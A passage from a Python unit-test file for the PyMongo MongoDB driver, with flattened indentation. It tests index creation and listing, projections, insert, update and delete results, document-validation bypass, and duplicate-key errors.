# mongos
for result in itervalues(reindexed['raw']):
check_result(result)
else:
check_result(reindexed)
with self.write_concern_collection() as coll:
coll.reindex()
def test_list_indexes(self):
db = self.db
db.test.drop()
db.test.insert_one({}) # create collection
def map_indexes(indexes):
return dict([(index["name"], index) for index in indexes])
indexes = list(db.test.list_indexes())
self.assertEqual(len(indexes), 1)
self.assertTrue("_id_" in map_indexes(indexes))
db.test.create_index("hello")
indexes = list(db.test.list_indexes())
self.assertEqual(len(indexes), 2)
self.assertEqual(map_indexes(indexes)["hello_1"]["key"],
SON([("hello", ASCENDING)]))
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)],
unique=True)
indexes = list(db.test.list_indexes())
self.assertEqual(len(indexes), 3)
index_map = map_indexes(indexes)
self.assertEqual(index_map["hello_-1_world_1"]["key"],
SON([("hello", DESCENDING), ("world", ASCENDING)]))
self.assertEqual(True, index_map["hello_-1_world_1"]["unique"])
def test_index_info(self):
db = self.db
db.test.drop()
db.test.insert_one({}) # create collection
self.assertEqual(len(db.test.index_information()), 1)
self.assertTrue("_id_" in db.test.index_information())
db.test.create_index("hello")
self.assertEqual(len(db.test.index_information()), 2)
self.assertEqual(db.test.index_information()["hello_1"]["key"],
[("hello", ASCENDING)])
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)],
unique=True)
self.assertEqual(db.test.index_information()["hello_1"]["key"],
[("hello", ASCENDING)])
self.assertEqual(len(db.test.index_information()), 3)
self.assertEqual([("hello", DESCENDING), ("world", ASCENDING)],
db.test.index_information()["hello_-1_world_1"]["key"]
)
self.assertEqual(
True, db.test.index_information()["hello_-1_world_1"]["unique"])
def test_index_geo2d(self):
db = self.db
db.test.drop_indexes()
self.assertEqual('loc_2d', db.test.create_index([("loc", GEO2D)]))
index_info = db.test.index_information()['loc_2d']
self.assertEqual([('loc', '2d')], index_info['key'])
@client_context.require_no_mongos
def test_index_haystack(self):
db = self.db
db.test.drop()
_id = db.test.insert_one({
"pos": {"long": 34.2, "lat": 33.3},
"type": "restaurant"
}).inserted_id
db.test.insert_one({
"pos": {"long": 34.2, "lat": 37.3}, "type": "restaurant"
})
db.test.insert_one({
"pos": {"long": 59.1, "lat": 87.2}, "type": "office"
})
db.test.create_index(
[("pos", GEOHAYSTACK), ("type", ASCENDING)],
bucketSize=1
)
results = db.command(SON([
("geoSearch", "test"),
("near", [33, 33]),
("maxDistance", 6),
("search", {"type": "restaurant"}),
("limit", 30),
]))['results']
self.assertEqual(2, len(results))
self.assertEqual({
"_id": _id,
"pos": {"long": 34.2, "lat": 33.3},
"type": "restaurant"
}, results[0])
@client_context.require_version_min(2, 3, 2)
@client_context.require_no_mongos
def test_index_text(self):
enable_text_search(self.client)
db = self.db
db.test.drop_indexes()
self.assertEqual("t_text", db.test.create_index([("t", TEXT)]))
index_info = db.test.index_information()["t_text"]
self.assertTrue("weights" in index_info)
if client_context.version.at_least(2, 5, 5):
db.test.insert_many([
{'t': 'spam eggs and spam'},
{'t': 'spam'},
{'t': 'egg sausage and bacon'}])
# MongoDB 2.6 text search. Create 'score' field in projection.
cursor = db.test.find(
{'$text': {'$search': 'spam'}},
{'score': {'$meta': 'textScore'}})
# Sort by 'score' field.
cursor.sort([('score', {'$meta': 'textScore'})])
results = list(cursor)
self.assertTrue(results[0]['score'] >= results[1]['score'])
db.test.drop_indexes()
@client_context.require_version_min(2, 3, 2)
def test_index_2dsphere(self):
db = self.db
db.test.drop_indexes()
self.assertEqual("geo_2dsphere",
db.test.create_index([("geo", GEOSPHERE)]))
for dummy, info in db.test.index_information().items():
field, idx_type = info['key'][0]
if field == 'geo' and idx_type == '2dsphere':
break
else:
self.fail("2dsphere index not found.")
poly = {"type": "Polygon",
"coordinates": [[[40, 5], [40, 6], [41, 6], [41, 5], [40, 5]]]}
query = {"geo": {"$within": {"$geometry": poly}}}
# This query will error without a 2dsphere index.
db.test.find(query)
db.test.drop_indexes()
@client_context.require_version_min(2, 3, 2)
def test_index_hashed(self):
db = self.db
db.test.drop_indexes()
self.assertEqual("a_hashed",
db.test.create_index([("a", HASHED)]))
for dummy, info in db.test.index_information().items():
field, idx_type = info['key'][0]
if field == 'a' and idx_type == 'hashed':
break
else:
self.fail("hashed index not found.")
db.test.drop_indexes()
def test_index_sparse(self):
db = self.db
db.test.drop_indexes()
db.test.create_index([('key', ASCENDING)], sparse=True)
self.assertTrue(db.test.index_information()['key_1']['sparse'])
def test_index_background(self):
db = self.db
db.test.drop_indexes()
db.test.create_index([('keya', ASCENDING)])
db.test.create_index([('keyb', ASCENDING)], background=False)
db.test.create_index([('keyc', ASCENDING)], background=True)
self.assertFalse('background' in db.test.index_information()['keya_1'])
self.assertFalse(db.test.index_information()['keyb_1']['background'])
self.assertTrue(db.test.index_information()['keyc_1']['background'])
def _drop_dups_setup(self, db):
db.drop_collection('test')
db.test.insert_one({'i': 1})
db.test.insert_one({'i': 2})
db.test.insert_one({'i': 2}) # duplicate
db.test.insert_one({'i': 3})
@client_context.require_version_max(2, 6)
def test_index_drop_dups(self):
# Try dropping duplicates
db = self.db
self._drop_dups_setup(db)
# No error, just drop the duplicate
db.test.create_index([('i', ASCENDING)], unique=True, dropDups=True)
# Duplicate was dropped
self.assertEqual(3, db.test.count())
# Index was created, plus the index on _id
self.assertEqual(2, len(db.test.index_information()))
def test_index_dont_drop_dups(self):
# Try *not* dropping duplicates
db = self.db
self._drop_dups_setup(db)
# There's a duplicate
def test_create():
db.test.create_index(
[('i', ASCENDING)],
unique=True,
dropDups=False
)
self.assertRaises(DuplicateKeyError, test_create)
# Duplicate wasn't dropped
self.assertEqual(4, db.test.count())
# Index wasn't created, only the default index on _id
self.assertEqual(1, len(db.test.index_information()))
# Get the plan dynamically because the explain format will change.
def get_plan_stage(self, root, stage):
if root.get('stage') == stage:
return root
elif "inputStage" in root:
return self.get_plan_stage(root['inputStage'], stage)
elif "inputStages" in root:
for i in root['inputStages']:
stage = self.get_plan_stage(i, stage)
if stage:
return stage
elif "shards" in root:
for i in root['shards']:
stage = self.get_plan_stage(i['winningPlan'], stage)
if stage:
return stage
return {}
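    # Illustrative note (not part of the original source): get_plan_stage()
    # walks a (simplified) explain() winningPlan tree such as
    #   {'stage': 'FETCH', 'inputStage': {'stage': 'IXSCAN', 'indexName': 'x_1'}}
    # depth-first through inputStage/inputStages/shards and returns the first
    # node whose 'stage' matches, or {} when no such stage exists.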
@client_context.require_version_min(3, 1, 9, -1)
def test_index_filter(self):
db = self.db
db.drop_collection("test")
# Test bad filter spec on create.
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression=5)
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression={"x": {"$asdasd": 3}})
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression={"$and": 5})
self.assertRaises(OperationFailure, db.test.create_index, "x",
partialFilterExpression={
"$and": [{"$and": [{"x": {"$lt": 2}},
{"x": {"$gt": 0}}]},
{"x": {"$exists": True}}]})
self.assertEqual("x_1", db.test.create_index(
[('x', ASCENDING)], partialFilterExpression={"a": {"$lte": 1.5}}))
db.test.insert_one({"x": 5, "a": 2})
db.test.insert_one({"x": 6, "a": 1})
# Operations that use the partial index.
explain = db.test.find({"x": 6, "a": 1}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'IXSCAN')
self.assertEqual("x_1", stage.get('indexName'))
self.assertTrue(stage.get('isPartial'))
explain = db.test.find({"x": {"$gt": 1}, "a": 1}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'IXSCAN')
self.assertEqual("x_1", stage.get('indexName'))
self.assertTrue(stage.get('isPartial'))
explain = db.test.find({"x": 6, "a": {"$lte": 1}}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'IXSCAN')
self.assertEqual("x_1", stage.get('indexName'))
self.assertTrue(stage.get('isPartial'))
# Operations that do not use the partial index.
explain = db.test.find({"x": 6, "a": {"$lte": 1.6}}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'COLLSCAN')
self.assertNotEqual({}, stage)
explain = db.test.find({"x": 6}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'COLLSCAN')
self.assertNotEqual({}, stage)
# Test drop_indexes.
db.test.drop_index("x_1")
explain = db.test.find({"x": 6, "a": 1}).explain()
stage = self.get_plan_stage(explain['queryPlanner']['winningPlan'],
'COLLSCAN')
self.assertNotEqual({}, stage)
def test_field_selection(self):
db = self.db
db.drop_collection("test")
doc = {"a": 1, "b": 5, "c": {"d": 5, "e": 10}}
db.test.insert_one(doc)
# Test field inclusion
doc = next(db.test.find({}, ["_id"]))
self.assertEqual(list(doc), ["_id"])
doc = next(db.test.find({}, ["a"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "a"])
doc = next(db.test.find({}, ["b"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "b"])
doc = next(db.test.find({}, ["c"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "c"])
doc = next(db.test.find({}, ["a"]))
self.assertEqual(doc["a"], 1)
doc = next(db.test.find({}, ["b"]))
self.assertEqual(doc["b"], 5)
doc = next(db.test.find({}, ["c"]))
self.assertEqual(doc["c"], {"d": 5, "e": 10})
# Test inclusion of fields with dots
doc = next(db.test.find({}, ["c.d"]))
self.assertEqual(doc["c"], {"d": 5})
doc = next(db.test.find({}, ["c.e"]))
self.assertEqual(doc["c"], {"e": 10})
doc = next(db.test.find({}, ["b", "c.e"]))
self.assertEqual(doc["c"], {"e": 10})
doc = next(db.test.find({}, ["b", "c.e"]))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "b", "c"])
doc = next(db.test.find({}, ["b", "c.e"]))
self.assertEqual(doc["b"], 5)
# Test field exclusion
doc = next(db.test.find({}, {"a": False, "b": 0}))
l = list(doc)
l.sort()
self.assertEqual(l, ["_id", "c"])
doc = next(db.test.find({}, {"_id": False}))
l = list(doc)
self.assertFalse("_id" in l)
def test_options(self):
db = self.db
db.drop_collection("test")
db.create_collection("test", capped=True, size=4096)
result = db.test.options()
# mongos 2.2.x adds an $auth field when auth is enabled.
result.pop('$auth', None)
self.assertEqual(result, {"capped": True, 'size': 4096})
db.drop_collection("test")
def test_insert_one(self):
db = self.db
db.test.drop()
document = {"_id": 1000}
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertTrue(isinstance(result.inserted_id, int))
self.assertEqual(document["_id"], result.inserted_id)
self.assertTrue(result.acknowledged)
self.assertIsNotNone(db.test.find_one({"_id": document["_id"]}))
self.assertEqual(1, db.test.count())
document = {"foo": "bar"}
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertTrue(isinstance(result.inserted_id, ObjectId))
self.assertEqual(document["_id"], result.inserted_id)
self.assertTrue(result.acknowledged)
self.assertIsNotNone(db.test.find_one({"_id": document["_id"]}))
self.assertEqual(2, db.test.count())
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertTrue(isinstance(result.inserted_id, ObjectId))
self.assertEqual(document["_id"], result.inserted_id)
self.assertFalse(result.acknowledged)
        # The insert failed with a duplicate key error, but with w=0 the
        # error is never reported; the count stays at 2.
        wait_until(lambda: 2 == db.test.count(), 'forcing duplicate key error')
document = RawBSONDocument(
bson.BSON.encode({'_id': ObjectId(), 'foo': 'bar'}))
result = db.test.insert_one(document)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertEqual(result.inserted_id, None)
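        # RawBSONDocument is treated as opaque bytes, so the driver cannot
        # report the _id it contains; inserted_id is None by design.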
def test_insert_many(self):
db = self.db
db.test.drop()
docs = [{} for _ in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(isinstance(result.inserted_ids, list))
self.assertEqual(5, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, ObjectId))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({'_id': _id}))
self.assertTrue(result.acknowledged)
docs = [{"_id": i} for i in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(isinstance(result.inserted_ids, list))
self.assertEqual(5, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, int))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({"_id": _id}))
self.assertTrue(result.acknowledged)
docs = [RawBSONDocument(bson.BSON.encode({"_id": i + 5}))
for i in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertTrue(isinstance(result.inserted_ids, list))
self.assertEqual([], result.inserted_ids)
db = db.client.get_database(db.name,
write_concern=WriteConcern(w=0))
docs = [{} for _ in range(5)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
self.assertFalse(result.acknowledged)
self.assertEqual(20, db.test.count())
def test_delete_one(self):
self.db.test.drop()
self.db.test.insert_one({"x": 1})
self.db.test.insert_one({"y": 1})
self.db.test.insert_one({"z": 1})
result = self.db.test.delete_one({"x": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertEqual(1, result.deleted_count)
self.assertTrue(result.acknowledged)
self.assertEqual(2, self.db.test.count())
result = self.db.test.delete_one({"y": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertEqual(1, result.deleted_count)
self.assertTrue(result.acknowledged)
self.assertEqual(1, self.db.test.count())
db = self.db.client.get_database(self.db.name,
write_concern=WriteConcern(w=0))
result = db.test.delete_one({"z": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertRaises(InvalidOperation, lambda: result.deleted_count)
self.assertFalse(result.acknowledged)
        wait_until(lambda: 0 == db.test.count(), 'delete 1 document')
def test_delete_many(self):
self.db.test.drop()
self.db.test.insert_one({"x": 1})
self.db.test.insert_one({"x": 1})
self.db.test.insert_one({"y": 1})
self.db.test.insert_one({"y": 1})
result = self.db.test.delete_many({"x": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertEqual(2, result.deleted_count)
self.assertTrue(result.acknowledged)
self.assertEqual(0, self.db.test.count({"x": 1}))
db = self.db.client.get_database(self.db.name,
write_concern=WriteConcern(w=0))
result = db.test.delete_many({"y": 1})
self.assertTrue(isinstance(result, DeleteResult))
self.assertRaises(InvalidOperation, lambda: result.deleted_count)
self.assertFalse(result.acknowledged)
wait_until(lambda: 0 == db.test.count(), 'delete 2 documents')
def test_command_document_too_large(self):
large = '*' * (self.client.max_bson_size + _COMMAND_OVERHEAD)
coll = self.db.test
self.assertRaises(
DocumentTooLarge, coll.insert_one, {'data': large})
        # replace_one, update_one, and update_many take the same code path.
self.assertRaises(
DocumentTooLarge, coll.replace_one, {}, {'data': large})
self.assertRaises(
DocumentTooLarge, coll.delete_one, {'data': large})
@client_context.require_version_min(3, 1, 9, -1)
def test_insert_bypass_document_validation(self):
db = self.db
db.test.drop()
db.create_collection("test", validator={"a": {"$exists": True}})
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
# Test insert_one
self.assertRaises(OperationFailure, db.test.insert_one,
{"_id": 1, "x": 100})
result = db.test.insert_one({"_id": 1, "x": 100},
bypass_document_validation=True)
self.assertTrue(isinstance(result, InsertOneResult))
self.assertEqual(1, result.inserted_id)
result = db.test.insert_one({"_id":2, "a":0})
self.assertTrue(isinstance(result, InsertOneResult))
self.assertEqual(2, result.inserted_id)
self.assertRaises(OperationFailure, db_w0.test.insert_one,
{"x": 1}, bypass_document_validation=True)
# Test insert_many
docs = [{"_id": i, "x": 100 - i} for i in range(3, 100)]
self.assertRaises(OperationFailure, db.test.insert_many, docs)
result = db.test.insert_many(docs, bypass_document_validation=True)
self.assertTrue(isinstance(result, InsertManyResult))
        self.assertEqual(97, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, int))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({"x": doc["x"]}))
self.assertTrue(result.acknowledged)
docs = [{"_id": i, "a": 200 - i} for i in range(100, 200)]
result = db.test.insert_many(docs)
self.assertTrue(isinstance(result, InsertManyResult))
        self.assertEqual(100, len(result.inserted_ids))
for doc in docs:
_id = doc["_id"]
self.assertTrue(isinstance(_id, int))
self.assertTrue(_id in result.inserted_ids)
self.assertEqual(1, db.test.count({"a": doc["a"]}))
self.assertTrue(result.acknowledged)
self.assertRaises(OperationFailure, db_w0.test.insert_many,
[{"x": 1}, {"x": 2}],
bypass_document_validation=True)
@client_context.require_version_min(3, 1, 9, -1)
def test_replace_bypass_document_validation(self):
db = self.db
db.test.drop()
db.create_collection("test", validator={"a": {"$exists": True}})
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
# Test replace_one
db.test.insert_one({"a": 101})
self.assertRaises(OperationFailure, db.test.replace_one,
{"a": 101}, {"y": 1})
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(1, db.test.count({"a": 101}))
db.test.replace_one({"a": 101}, {"y": 1},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"a": 101}))
self.assertEqual(1, db.test.count({"y": 1}))
db.test.replace_one({"y": 1}, {"a": 102})
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(0, db.test.count({"a": 101}))
self.assertEqual(1, db.test.count({"a": 102}))
db.test.insert_one({"y": 1}, bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.replace_one,
{"y": 1}, {"x": 101})
self.assertEqual(0, db.test.count({"x": 101}))
self.assertEqual(1, db.test.count({"y": 1}))
db.test.replace_one({"y": 1}, {"x": 101},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"y": 1}))
self.assertEqual(1, db.test.count({"x": 101}))
db.test.replace_one({"x": 101}, {"a": 103},
bypass_document_validation=False)
self.assertEqual(0, db.test.count({"x": 101}))
self.assertEqual(1, db.test.count({"a": 103}))
self.assertRaises(OperationFailure, db_w0.test.replace_one, {"y": 1},
{"x": 1}, bypass_document_validation=True)
@client_context.require_version_min(3, 1, 9, -1)
def test_update_bypass_document_validation(self):
db = self.db
db.test.drop()
db.test.insert_one({"z": 5})
db.command(SON([("collMod", "test"),
("validator", {"z": {"$gte": 0}})]))
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
# Test update_one
self.assertRaises(OperationFailure, db.test.update_one,
{"z": 5}, {"$inc": {"z": -10}})
self.assertEqual(0, db.test.count({"z": -5}))
self.assertEqual(1, db.test.count({"z": 5}))
db.test.update_one({"z": 5}, {"$inc": {"z": -10}},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"z": 5}))
self.assertEqual(1, db.test.count({"z": -5}))
db.test.update_one({"z": -5}, {"$inc": {"z": 6}},
bypass_document_validation=False)
self.assertEqual(1, db.test.count({"z": 1}))
self.assertEqual(0, db.test.count({"z": -5}))
db.test.insert_one({"z": -10},
bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.update_one,
{"z": -10}, {"$inc": {"z": 1}})
self.assertEqual(0, db.test.count({"z": -9}))
self.assertEqual(1, db.test.count({"z": -10}))
db.test.update_one({"z": -10}, {"$inc": {"z": 1}},
bypass_document_validation=True)
self.assertEqual(1, db.test.count({"z": -9}))
self.assertEqual(0, db.test.count({"z": -10}))
db.test.update_one({"z": -9}, {"$inc": {"z": 9}},
bypass_document_validation=False)
self.assertEqual(0, db.test.count({"z": -9}))
self.assertEqual(1, db.test.count({"z": 0}))
self.assertRaises(OperationFailure, db_w0.test.update_one, {"y": 1},
{"$inc": {"x": 1}}, bypass_document_validation=True)
# Test update_many
db.test.insert_many([{"z": i} for i in range(3, 101)])
db.test.insert_one({"y": 0},
bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.update_many, {},
{"$inc": {"z": -100}})
self.assertEqual(100, db.test.count({"z": {"$gte": 0}}))
self.assertEqual(0, db.test.count({"z": {"$lt": 0}}))
self.assertEqual(0, db.test.count({"y": 0, "z": -100}))
db.test.update_many({"z": {"$gte": 0}}, {"$inc": {"z": -100}},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"z": {"$gt": 0}}))
self.assertEqual(100, db.test.count({"z": {"$lte": 0}}))
db.test.update_many({"z": {"$gt": -50}}, {"$inc": {"z": 100}},
bypass_document_validation=False)
self.assertEqual(50, db.test.count({"z": {"$gt": 0}}))
self.assertEqual(50, db.test.count({"z": {"$lt": 0}}))
db.test.insert_many([{"z": -i} for i in range(50)],
bypass_document_validation=True)
self.assertRaises(OperationFailure, db.test.update_many,
{}, {"$inc": {"z": 1}})
self.assertEqual(100, db.test.count({"z": {"$lte": 0}}))
self.assertEqual(50, db.test.count({"z": {"$gt": 1}}))
db.test.update_many({"z": {"$gte": 0}}, {"$inc": {"z": -100}},
bypass_document_validation=True)
self.assertEqual(0, db.test.count({"z": {"$gt": 0}}))
self.assertEqual(150, db.test.count({"z": {"$lte": 0}}))
db.test.update_many({"z": {"$lte": 0}}, {"$inc": {"z": 100}},
bypass_document_validation=False)
self.assertEqual(150, db.test.count({"z": {"$gte": 0}}))
self.assertEqual(0, db.test.count({"z": {"$lt": 0}}))
self.assertRaises(OperationFailure, db_w0.test.update_many, {"y": 1},
{"$inc": {"x": 1}}, bypass_document_validation=True)
@client_context.require_version_min(3, 1, 9, -1)
def test_bypass_document_validation_bulk_write(self):
db = self.db
db.test.drop()
db.create_collection("test", validator={"a": {"$gte": 0}})
db_w0 = self.db.client.get_database(
self.db.name, write_concern=WriteConcern(w=0))
ops = [InsertOne({"a": -10}),
InsertOne({"a": -11}),
InsertOne({"a": -12}),
UpdateOne({"a": {"$lte": -10}}, {"$inc": {"a": 1}}),
UpdateMany({"a": {"$lte": -10}}, {"$inc": {"a": 1}}),
ReplaceOne({"a": {"$lte": -10}}, {"a": -1})]
db.test.bulk_write(ops, bypass_document_validation=True)
self.assertEqual(3, db.test.count())
self.assertEqual(1, db.test.count({"a": -11}))
self.assertEqual(1, db.test.count({"a": -1}))
self.assertEqual(1, db.test.count({"a": -9}))
# Assert that the operations would fail without bypass_doc_val
for op in ops:
self.assertRaises(BulkWriteError, db.test.bulk_write, [op])
self.assertRaises(OperationFailure, db_w0.test.bulk_write, ops,
bypass_document_validation=True)
def test_find_by_default_dct(self):
db = self.db
db.test.insert_one({'foo': 'bar'})
dct = defaultdict(dict, [('foo', 'bar')])
self.assertIsNotNone(db.test.find_one(dct))
self.assertEqual(dct, defaultdict(dict, [('foo', 'bar')]))
def test_find_w_fields(self):
db = self.db
db.test.delete_many({})
db.test.insert_one({"x": 1, "mike": "awesome",
"extra thing": "abcdefghijklmnopqrstuvwxyz"})
self.assertEqual(1, db.test.count())
doc = next(db.test.find({}))
self.assertTrue("x" in doc)
doc = next(db.test.find({}))
self.assertTrue("mike" in doc)
doc = next(db.test.find({}))
self.assertTrue("extra thing" in doc)
doc = next(db.test.find({}, ["x", "mike"]))
self.assertTrue("x" in doc)
doc = next(db.test.find({}, ["x", "mike"]))
self.assertTrue("mike" in doc)
doc = next(db.test.find({}, ["x", "mike"]))
self.assertFalse("extra thing" in doc)
doc = next(db.test.find({}, ["mike"]))
self.assertFalse("x" in doc)
doc = next(db.test.find({}, ["mike"]))
self.assertTrue("mike" in doc)
doc = next(db.test.find({}, ["mike"]))
self.assertFalse("extra thing" in doc)
def test_fields_specifier_as_dict(self):
db = self.db
db.test.delete_many({})
db.test.insert_one({"x": [1, 2, 3], "mike": "awesome"})
self.assertEqual([1, 2, 3], db.test.find_one()["x"])
self.assertEqual([2, 3],
db.test.find_one(
projection={"x": {"$slice": -2}})["x"])
self.assertTrue("x" not in db.test.find_one(projection={"x": 0}))
self.assertTrue("mike" in db.test.find_one(projection={"x": 0}))
def test_find_w_regex(self):
db = self.db
db.test.delete_many({})
db.test.insert_one({"x": "hello_world"})
db.test.insert_one({"x": "hello_mike"})
db.test.insert_one({"x": "hello_mikey"})
db.test.insert_one({"x": "hello_test"})
self.assertEqual(db.test.find().count(), 4)
self.assertEqual(db.test.find({"x":
re.compile("^hello.*")}).count(), 4)
self.assertEqual(db.test.find({"x":
re.compile("ello")}).count(), 4)
self.assertEqual(db.test.find({"x":
re.compile("^hello$")}).count(), 0)
self.assertEqual(db.test.find({"x":
re.compile("^hello_mi.*$")}).count(), 2)
def test_id_can_be_anything(self):
db = self.db
db.test.delete_many({})
auto_id = {"hello": "world"}
db.test.insert_one(auto_id)
self.assertTrue(isinstance(auto_id["_id"], ObjectId))
numeric = {"_id": 240, "hello": "world"}
db.test.insert_one(numeric)
self.assertEqual(numeric["_id"], 240)
obj = {"_id": numeric, "hello": "world"}
db.test.insert_one(obj)
self.assertEqual(obj["_id"], numeric)
for x in db.test.find():
self.assertEqual(x["hello"], u"world")
self.assertTrue("_id" in x)
def test_invalid_key_names(self):
db = self.db
db.test.drop()
db.test.insert_one({"hello": "world"})
db.test.insert_one({"hello": {"hello": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"$hello": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {"$hello": "world"}})
db.test.insert_one({"he$llo": "world"})
db.test.insert_one({"hello": {"hello$": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{".hello": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {".hello": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello.": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {"hello.": "world"}})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hel.lo": "world"})
self.assertRaises(InvalidDocument, db.test.insert_one,
{"hello": {"hel.lo": "world"}})
def test_unique_index(self):
db = self.db
db.drop_collection("test")
db.test.create_index("hello")
# No error.
db.test.insert_one({"hello": "world"})
db.test.insert_one({"hello": "world"})
db.drop_collection("test")
db.test.create_index("hello", unique=True)
with self.assertRaises(DuplicateKeyError):
db.test.insert_one({"hello": "world"})
db.test.insert_one({"hello": "world"})
def test_duplicate_key_error(self):
db = self.db
db.drop_collection("test")
db.test.create_index("x", unique=True)
db.test.insert_one({"_id": 1, "x": 1})
with self.assertRaises(DuplicateKeyError) as context:
db.test.insert_one({"x": 1})
self.assertIsNotNone(context.exception.details)
with self.assertRaises(DuplicateKeyError) as context:
db.test.insert_one({"x": 1})
self.assertIsNotNone(context.exception.details)
self.assertEqual(1, db.test.count())
def test_write_error_text_handling(self):
db = self.db
db.drop_collection("test")
db.test.create_index("text", unique=True)
# Test workaround for SERVER-24007
data = (b'a\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83'
b'\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83\xe2\x98\x83')
text = data.decode("utf8")
db.test.insert_one({"text": text})
# Should raise DuplicateKeyError, not InvalidBSON
self.assertRaises(DuplicateKeyError,
db.test.insert_one,
{"text": text})
self.assertRaises(DuplicateKeyError,
db.test.insert,
{"text": text})
self.assertRaises(DuplicateKeyError,
db.test.insert,
[{"text": text}])
self.assertRaises(DuplicateKeyError,
db.test.replace_one,
{"_id": ObjectId()},
{"text": text},
upsert=True)
self.assertRaises(DuplicateKeyError,
db.test.update,
{"_id": ObjectId()},
{"text": text},
upsert=True)
# Should raise BulkWriteError, not InvalidBSON
self.assertRaises(BulkWriteError,
db.test.insert_many,
